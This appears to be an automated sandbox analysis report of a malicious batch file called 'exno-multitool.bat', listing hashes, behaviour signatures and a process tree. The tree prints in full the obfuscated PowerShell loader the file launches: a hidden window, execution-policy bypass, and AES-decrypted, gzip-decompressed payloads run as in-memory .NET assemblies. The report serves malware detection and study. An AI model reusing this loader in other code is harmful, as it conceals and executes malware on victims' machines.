6da093e67df15817141cb314b208da8c750e14bcda70293aac9aea354f708a92

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
08-08-2024 21:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

exno-multitool.bat
Size

312KB
MD5

35f2566540e2b6d4d6936a1f69c9b61c
SHA1

c54fdbe3b77c3cb24daf7e0157236c088f06b9e0
SHA256

6da093e67df15817141cb314b208da8c750e14bcda70293aac9aea354f708a92
SHA512

4096802c29db97ad4cec416413c35a2060c3da13c9512c1290beff6ab518b6fd18867a57771f4e7a3c96b077bf96408ddf2732cc602fa8d6166a374d2f7cbae9
SSDEEP

6144:YuQfKrYP5G4V8rw0vUPaPJKHNVdhsjIq7pZMB+hhQi/rcf06yfnkX:Yu1rkG4V8rw6U2JKtVPsjIwMBqjDcVyY

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
536	powershell.exe

Deletes itself 1 IoCs

pid	Process
2384	cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
536	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	536	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2384 wrote to memory of 2364	2384	cmd.exe	31
PID 2384 wrote to memory of 2364	2384	cmd.exe	31
PID 2384 wrote to memory of 2364	2384	cmd.exe	31
PID 2364 wrote to memory of 2524	2364	net.exe	32
PID 2364 wrote to memory of 2524	2364	net.exe	32
PID 2364 wrote to memory of 2524	2364	net.exe	32
PID 2384 wrote to memory of 536	2384	cmd.exe	34
PID 2384 wrote to memory of 536	2384	cmd.exe	34
PID 2384 wrote to memory of 536	2384	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\exno-multitool.bat"
1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2384
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:2524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('I0jI0qtY3qge7WyHgfO6HOlFqpTg3dHlLT8OkI8yKOA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hQuMbYzUJ3yxCHU9f2Vp5A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OUySP=New-Object System.IO.MemoryStream(,$param_var); $VrcKV=New-Object System.IO.MemoryStream; $WvYPb=New-Object System.IO.Compression.GZipStream($OUySP, [IO.Compression.CompressionMode]::Decompress); $WvYPb.CopyTo($VrcKV); $WvYPb.Dispose(); $OUySP.Dispose(); $VrcKV.Dispose(); $VrcKV.ToArray();}function execute_function($param_var,$param2_var){ $USsBl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ffVqt=$USsBl.EntryPoint; $ffVqt.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\exno-multitool.bat';$rOTmt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\exno-multitool.bat').Split([Environment]::NewLine);foreach ($OjVmo in $rOTmt) { if ($OjVmo.StartsWith(':: ')) { $RLkHj=$OjVmo.Substring(3); break; }}$payloads_var=[string[]]$RLkHj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/536-4-0x000007FEF5B4E000-0x000007FEF5B4F000-memory.dmp

Filesize
4KB

Download
memory/536-5-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

Filesize
2.9MB

Download
memory/536-6-0x0000000002890000-0x0000000002898000-memory.dmp

Filesize
32KB

Download
memory/536-8-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

Filesize
9.6MB

Download
memory/536-7-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

Filesize
9.6MB

Download
memory/536-9-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

Filesize
9.6MB

Download
memory/536-10-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

Filesize
9.6MB

Download
memory/536-11-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

Filesize
9.6MB

Download
memory/536-12-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

Filesize
9.6MB

Download